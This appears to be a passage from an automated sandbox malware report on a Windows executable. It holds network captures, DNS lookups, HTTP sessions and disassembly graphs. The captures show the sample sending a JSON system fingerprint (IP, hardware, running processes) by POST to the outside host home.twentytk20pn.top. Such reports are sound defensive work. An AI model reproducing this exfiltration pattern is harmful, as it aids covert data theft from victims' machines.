                                                            Dec 20, 2024 16:37:57.469166040 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469300032 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469309092 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469317913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469434023 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469451904 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469461918 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469572067 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469582081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469587088 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469723940 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469733000 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469741106 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469752073 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469891071 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469899893 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469908953 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470033884 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470043898 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470053911 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470062971 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470201969 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470211983 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470220089 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470228910 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470240116 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470249891 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470263958 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470273018 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470282078 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470300913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470309973 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470319033 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.567173004 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.567444086 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:58.709232092 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:58.829334021 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:58.829432011 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:58.829854965 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:58.949481964 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:38:00.259150982 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:38:00.259170055 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:38:00.259299994 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:38:00.259756088 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:38:00.379561901 CET8049732147.45.113.159192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:37:52.235081911 CET | 57301 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:37:52.235239029 CET | 57301 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:37:52.372595072 CET | 53 | 57301 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:37:52.528939962 CET | 53 | 57301 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:37:55.619620085 CET | 57304 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:37:55.619688988 CET | 57304 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:37:55.759844065 CET | 53 | 57304 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:37:55.904784918 CET | 53 | 57304 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:37:58.034225941 CET | 57306 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:37:58.034327030 CET | 57306 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:37:58.173342943 CET | 53 | 57306 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:37:58.708002090 CET | 53 | 57306 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:37:52.235081911 CET | 192.168.2.4 | 1.1.1.1 | 0xe671 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:37:52.235239029 CET | 192.168.2.4 | 1.1.1.1 | 0xfab1 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 16:37:55.619620085 CET | 192.168.2.4 | 1.1.1.1 | 0xbd45 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:37:55.619688988 CET | 192.168.2.4 | 1.1.1.1 | 0x6e53 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:37:58.034225941 CET | 192.168.2.4 | 1.1.1.1 | 0x1e11 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:37:58.034327030 CET | 192.168.2.4 | 1.1.1.1 | 0x50f | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:37:52.528939962 CET | 1.1.1.1 | 192.168.2.4 | 0xe671 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:37:52.528939962 CET | 1.1.1.1 | 192.168.2.4 | 0xe671 | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:37:55.759844065 CET | 1.1.1.1 | 192.168.2.4 | 0xbd45 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:37:58.708002090 CET | 1.1.1.1 | 192.168.2.4 | 0x1e11 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
                                                            • httpbin.org
                                                            • home.twentytk20pn.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 147.45.113.159 | 80 | 7600 | C:\Users\user\Desktop\1o81tDUu5M.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:37:56.033643961 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 456478
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709074", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Dec 20, 2024 16:37:56.155673981 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.155708075 CET  7416  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.155778885 CET  14832  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.275862932 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.275897980 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.275959015 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.275979996 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.276248932 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.276263952 CET  2472  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:56.323246956 CET  27192  OUT  Data Raw/Ascii: encoded payload chunk (opaque data omitted)
                                                            Dec 20, 2024 16:37:57.447432041 CET  212  IN  HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session ID: 1
                                                            Source IP: 192.168.2.4
                                                            Source Port: 49732
                                                            Destination IP: 147.45.113.159
                                                            Destination Port: 80
                                                            PID: 7600
                                                            Process: C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Dec 20, 2024 16:37:58.829854965 CET  287  OUT  POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 16:38:00.259150982 CET  212  IN  HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session ID: 0
                                                            Source IP: 192.168.2.4
                                                            Source Port: 49730
                                                            Destination IP: 34.226.108.155
                                                            Destination Port: 443
                                                            PID: 7600
                                                            Process: C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            2024-12-20 15:37:54 UTC  52  OUT  GET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 15:37:54 UTC  224  IN  HTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 15:37:54 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 15:37:54 UTC  31  IN  Data Ascii: { "origin": "8.46.123.189"}



                                                            Target ID:0
                                                            Start time:10:37:48
                                                            Start date:20/12/2024
                                                            Path:C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\1o81tDUu5M.exe"
                                                            Imagebase:0x930000
                                                            File size:4'456'448 bytes
                                                            MD5 hash:3FBE557C7EC8409F30604B0F5E365F70
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:2.8%
                                                              Dynamic/Decrypted Code Coverage:4.7%
                                                              Signature Coverage:11%
                                                              Total number of Nodes:534
                                                              Total number of Limit Nodes:90

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00932579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 009325CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00932647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 0093267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 009327E2
                                                              • FindFirstFileW.KERNELBASE ref: 009328F8
                                                              • FindNextFileW.KERNELBASE ref: 0093291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: @$`
                                                              • API String ID: 3271271169-3318628307
                                                              • Opcode ID: e83f45b9d64bda700c6565a276362898be3a774984bf43f189f56bf05fc9c19c
                                                              • Instruction ID: ea3a651d1149a9761d7840bcc016c472a591da6113a199980f177d8b70b8c66f
                                                              • Opcode Fuzzy Hash: e83f45b9d64bda700c6565a276362898be3a774984bf43f189f56bf05fc9c19c
                                                              • Instruction Fuzzy Hash: 00D1B3B49057099FCB10EF68D98569EBBF0FF48354F00896EE89897350E7749A84CF62

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 927 9329ff-932a2f FindFirstFileA 928 932a31-932a36 927->928 929 932a38 927->929 930 932a3d-932a91 call d6f8d0 call d6f960 RegOpenKeyExA 928->930 929->930 935 932a93-932a98 930->935 936 932a9a 930->936 937 932a9f-932b0c call d6f8d0 call d6f960 CharUpperA call cb8da0 935->937 936->937 945 932b15 937->945 946 932b0e-932b13 937->946 947 932b1a-932b92 call d6f8d0 call d6f960 call cb8e80 call cb8e70 945->947 946->947 956 932b94-932ba3 947->956 957 932bcc-932c66 QueryFullProcessImageNameA CloseHandle call cb8da0 947->957 960 932bb0-932bca call cb8e68 956->960 961 932ba5-932bae 956->961 967 932c68-932c6d 957->967 968 932c6f 957->968 960->956 960->957 961->957 969 932c74-932ce9 call d6f8d0 call d6f960 call cb8e80 call cb8e70 967->969 968->969 978 932dcf-932e1c call d6f8d0 call d6f960 CloseHandle 969->978 979 932cef-932d49 call cb8bb0 call cb8da0 969->979 989 932e23-932e2e 978->989 990 932d4b-932d63 call cb8da0 979->990 991 932d99-932dad 979->991 992 932e30-932e35 989->992 993 932e37 989->993 990->991 1000 932d65-932d7d call cb8da0 990->1000 991->978 995 932e3c-932ed6 call d6f8d0 call d6f960 992->995 993->995 1008 932eea 995->1008 1009 932ed8-932ee1 995->1009 1000->991 1005 932d7f-932d97 call cb8da0 1000->1005 1005->991 1013 932daf-932dc9 call cb8e68 1005->1013 1012 932eef-932f16 call d6f8d0 call d6f960 1008->1012 1009->1008 1011 932ee3-932ee8 1009->1011 1011->1012 1013->978 1013->979
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: fb25663f68c727def78012b4b4f1668e4c05e30a195c5b00dad9631d43e92fca
                                                              • Instruction ID: 86c852be6e2b70ba68e64a481eeb2064bf5bfe76b17ff85964b685c4197906a5
                                                              • Opcode Fuzzy Hash: fb25663f68c727def78012b4b4f1668e4c05e30a195c5b00dad9631d43e92fca
                                                              • Instruction Fuzzy Hash: 59E1F8B49047499FCB10EF69D98569EBBF4EF44304F10886AE888DB350E774DA88DF52

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1310 9405b0-9405b7 1311 9405bd-9405d4 1310->1311 1312 9407ee 1310->1312 1313 9407e7-9407ed 1311->1313 1314 9405da-9405e6 1311->1314 1313->1312 1314->1313 1315 9405ec-9405f0 1314->1315 1316 9405f6-940620 call 947350 call 9370b0 1315->1316 1317 9407c7-9407cc 1315->1317 1322 940622-940624 1316->1322 1323 94066a-94068c call 96dec0 1316->1323 1317->1313 1325 940630-940655 call 9370d0 call 9403c0 call 947450 1322->1325 1329 9407d6-9407e3 call 947380 1323->1329 1330 940692-9406a0 1323->1330 1350 9407ce 1325->1350 1351 94065b-940668 call 9370e0 1325->1351 1329->1313 1333 9406f4-9406f6 1330->1333 1334 9406a2-9406a4 1330->1334 1336 9406fc-9406fe 1333->1336 1337 9407ef-94082b call 943000 1333->1337 1339 9406b0-9406e4 call 9473b0 1334->1339 1341 94072c-940754 1336->1341 1354 940831-940837 1337->1354 1355 940a2f-940a35 1337->1355 1339->1329 1349 9406ea-9406ee 1339->1349 1346 940756-94075b 1341->1346 1347 94075f-94078b 1341->1347 1352 940707-940719 WSAEventSelect 1346->1352 1353 94075d 1346->1353 1367 940700-940703 1347->1367 1368 940791-940796 1347->1368 1349->1339 1356 9406f0 1349->1356 1350->1329 1351->1323 1351->1325 1352->1329 1360 94071f 1352->1360 1361 940723-940726 1353->1361 1363 940861-94087e 1354->1363 1364 940839-94084c call 946fa0 1354->1364 1357 940a37-940a3a 1355->1357 1358 940a3c-940a52 1355->1358 1356->1333 1357->1358 1358->1329 1365 940a58-940a81 call 942f10 1358->1365 1360->1361 1361->1337 1361->1341 1377 940882-94088d 1363->1377 1375 940852 1364->1375 1376 940a9c-940aa4 1364->1376 1365->1329 1383 940a87-940a97 call 946df0 1365->1383 1367->1352 1368->1367 1370 94079c-9407c2 call 9376a0 1368->1370 1370->1367 1375->1363 1380 940854-94085f 1375->1380 1376->1329 1381 940970-940975 1377->1381 1382 940893-9408b1 1377->1382 1380->1377 1384 940a19-940a2c 1381->1384 1385 94097b-940989 call 9370b0 1381->1385 1386 9408c8-9408f7 1382->1386 1383->1329 1384->1355 1385->1384 1393 94098f-94099e 
1385->1393 1394 9408fd-940925 1386->1394 1395 9408f9-9408fb 1386->1395 1396 9409b0-9409c1 call 9370d0 1393->1396 1397 940928-94093f 1394->1397 1395->1397 1403 9409a0-9409ae call 9370e0 1396->1403 1404 9409c3-9409c7 1396->1404 1401 940945-94096b 1397->1401 1402 9408b3-9408c2 1397->1402 1401->1402 1402->1381 1402->1386 1403->1384 1403->1396 1406 9409e8-940a03 WSAEnumNetworkEvents 1404->1406 1407 940a05-940a17 1406->1407 1408 9409d0-9409e6 WSAEventSelect 1406->1408 1407->1408 1408->1403 1408->1406
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00940712
                                                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 009409DC
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 009409FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: multi.c
                                                              • API String ID: 2170980988-214371023
                                                              • Opcode ID: 68a4caeaa6ad339fad0ac29024c043039de8c0643e9ed7e8d21f087b8af2df5e
                                                              • Instruction ID: 487e591e886c6bca9088abf6bf9b1547815fd8cc959efc53f371d91756144c40
                                                              • Opcode Fuzzy Hash: 68a4caeaa6ad339fad0ac29024c043039de8c0643e9ed7e8d21f087b8af2df5e
                                                              • Instruction Fuzzy Hash: 47D1AD756083059BEB10CF64C881B6BBBE9FFD4348F04482CFA8596242E775E958CB93

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1553 937770-93778e 1554 937790-937797 1553->1554 1555 9377b6-9377c2 recv 1553->1555 1554->1555 1556 937799-9377a1 1554->1556 1557 9377c4-9377d9 call 9372a0 1555->1557 1558 93782e-937832 1555->1558 1559 9377a3-9377b4 1556->1559 1560 9377db-937829 call 9372a0 call 93cb20 call cb8c50 1556->1560 1557->1558 1559->1557 1560->1558
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: ff2b8a617370c8bbd56d17a575537d7c197db58bff1ca1531ce719ec0ac77657
                                                              • Instruction ID: 433f82c3418ee04180ba26109b7a5d9ee70466df3e44ce143d4918e546f9248a
                                                              • Opcode Fuzzy Hash: ff2b8a617370c8bbd56d17a575537d7c197db58bff1ca1531ce719ec0ac77657
                                                              • Instruction Fuzzy Hash: D4110DF5A1C348BFE530A7599C4AE2BBB9CDFC5B68F441518F80863342D5659C04C9B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
